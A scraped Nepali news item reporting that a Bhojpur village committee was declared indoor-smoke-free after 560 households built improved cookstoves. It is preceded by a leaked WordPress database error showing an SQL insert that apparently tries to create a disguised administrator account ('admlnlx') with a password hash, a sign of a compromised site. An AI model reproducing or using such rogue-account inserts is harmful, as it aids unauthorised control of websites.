WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlT2uFnfAvVRA9jCt7eMe2yAoffMH6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:32:07', '', 'admlnlx', 'admlnlx')
भोजपुर, पुस ८ –
भोजपुरको छिनामखु गाविस बिहीबार एक कार्यक्रमबीच घरभित्रको धुवाँमुक्त गाविस घोषित भएको छ ।
भोजपुरलाई घरभित्रको धुवाँमुक्त घोषणाको लक्ष्यअनुसार सो गाविसलाई १९औँ घरभित्रको धुवाँमुक्त गाविस घोषणा गरिएको सामूहिक अभियानका कार्यक्रम संयोजक मिलन भण्डारीले जानकारी दिनुभयो ।
गाविस र सामूहिक अभियान भोजपुरको साझेदारीमा गाविसका पाँचसय ६० घरमा सबैले सुधारिएको चुल्हो निर्माण गरेपछि यो गाविसलाई घरभित्रको धुवाँमुक्त गाविस घोषणा गरिएको हो ।
यसैबीच, हालसम्म भोजपुरमा २० हजार पाँचसय ६० सुधारिएको चुल्होे निर्माण गरिसकेको बताइएको छ । – रासस